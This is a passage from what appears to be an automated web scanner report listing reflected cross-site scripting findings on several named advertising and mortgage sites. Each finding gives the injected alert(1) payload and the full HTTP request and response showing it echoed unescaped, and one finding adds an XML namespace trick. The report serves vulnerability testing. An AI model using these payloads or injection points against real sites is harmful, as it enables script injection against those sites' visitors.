Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7c45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:35 GMT;path=/;httponly
Content-Length: 6459


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319ba9e7"><script>alert(1)</script>71945edcd2&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.154. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee1d"><script>alert(1)</script>f134721e21d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=6968294ee1d"><script>alert(1)</script>f134721e21d&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:33 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:25 GMT;path=/;httponly
Content-Length: 2867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d544/544003/index4.html?scid=1794971&cid=6968294ee1d"><script>alert(1)</script>f134721e21d&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d544/54
...[SNIP]...

1.155. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [dynamic_proxy parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb3a"><script>alert(1)</script>297f12ffdf6 was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=17eb3a"><script>alert(1)</script>297f12ffdf6&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:12:31 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:22 GMT;path=/;httponly
Content-Length: 2867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=17eb3a"><script>alert(1)</script>297f12ffdf6&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa0
...[SNIP]...

1.156. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9de62"><script>alert(1)</script>2b2bf4c448b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1&9de62"><script>alert(1)</script>2b2bf4c448b=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:14:22 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:43:14 GMT;path=/;httponly
Content-Length: 2873

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
rl" href="/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1&9de62"><script>alert(1)</script>2b2bf4c448b=1" target="RL_top" onClick="javascript:open_popup('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gs
...[SNIP]...

1.157. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [primary_serv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27040"><script>alert(1)</script>aafc10e2bc0 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com27040"><script>alert(1)</script>aafc10e2bc0&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:12:54 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:45 GMT;path=/;httponly
Content-Length: 2867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com27040"><script>alert(1)</script>aafc10e2bc0&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_
...[SNIP]...

1.158. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [rl_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8861"><script>alert(1)</script>1103dfbaf was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0b8861"><script>alert(1)</script>1103dfbaf&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:12:13 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:05 GMT;path=/;httponly
Content-Length: 2863

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0b8861"><script>alert(1)</script>1103dfbaf&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319
...[SNIP]...

1.159. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [rl_track_landing_pages parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd298"><script>alert(1)</script>b6146d9bf2b was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1fd298"><script>alert(1)</script>b6146d9bf2b HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:13:11 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7845525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:42:03 GMT;path=/;httponly
Content-Length: 2867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
url" href="/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1fd298"><script>alert(1)</script>b6146d9bf2b" target="RL_top" onClick="javascript:open_popup('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbm
...[SNIP]...

1.160. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [scid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c936"><script>alert(1)</script>e5cf5050a89 was submitted in the scid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=17949717c936"><script>alert(1)</script>e5cf5050a89&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:11 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:02 GMT;path=/;httponly
Content-Length: 2867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d544/544003/index4.html?scid=17949717c936"><script>alert(1)</script>e5cf5050a89&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/cou
...[SNIP]...

1.161. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [tc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index5.html

Issue detail

The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41069"><script>alert(1)</script>db536dcf13f was submitted in the tc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=1102030800259531941069"><script>alert(1)</script>db536dcf13f&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:55 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:47 GMT;path=/;httponly
Content-Length: 2867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=1102030800259531941069"><script>alert(1)</script>db536dcf13f&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d544/544003/index4.html?scid
...[SNIP]...

1.162. http://gsbmtg1-px.rtrk.com/forms.php [load parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg1-px.rtrk.com
Path:   /forms.php

Issue detail

The value of the load request parameter is copied into the XML document as plain text between tags. The payload 5cf32<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>318d6c3ecd0 was submitted in the load parameter. This input was echoed as 5cf32<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>318d6c3ecd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

POST /forms.php HTTP/1.1
Host: gsbmtg1-px.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg1-px.rtrk.com/home.html
Origin: http://gsbmtg1-px.rtrk.com
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319%26clk%3D1296748826%26dynamic_proxy%3D1%26primary_serv%3Dgsbmtg1-px.rtrk.com; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0; __utmz=41275828.1296748869.1.1.utmcsr=gsbmtg.rtrk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=41275828.848354389.1296748869.1296748869.1296748869.1; __utmc=41275828; __utmb=41275828.1.10.1296748869; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Content-Length: 28

page=quickQuoteData&load=yes5cf32<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>318d6c3ecd0

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:03:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.6
X-RL-Host: pweb107
X-Robots-Tag: noindex,nofollow
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: SID=e52c977d4154461315941161ee33cb46;path=/
Content-Length: 226
Set-Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:31:50 GMT;path=/;httponly

<?xml version="1.0" ?><status><pageto>yes5cf32<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>318d6c3ecd0</pageto><redirect>&amp;nbsp;</redirect><homeSearchSource>%26nbsp%3B</
...[SNIP]...

1.163. http://guru.sitescout.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74ac4'%3balert(1)//23282effb6e was submitted in the h parameter. This input was echoed as 74ac4';alert(1)//23282effb6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=7C8A652&w=300&h=25074ac4'%3balert(1)//23282effb6e&rnd=1219859 HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Thu, 03 Feb 2011 16:04:29 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=7C8A652&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="25074ac4';alert(1)//23282effb6e" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.164. http://guru.sitescout.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8759f"%3balert(1)//240ee4185ab was submitted in the pid parameter. This input was echoed as 8759f";alert(1)//240ee4185ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=7C8A6528759f"%3balert(1)//240ee4185ab&w=300&h=250&rnd=1219859 HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Thu, 03 Feb 2011 16:04:28 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=7C8A6528759f";alert(1)//240ee4185ab&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

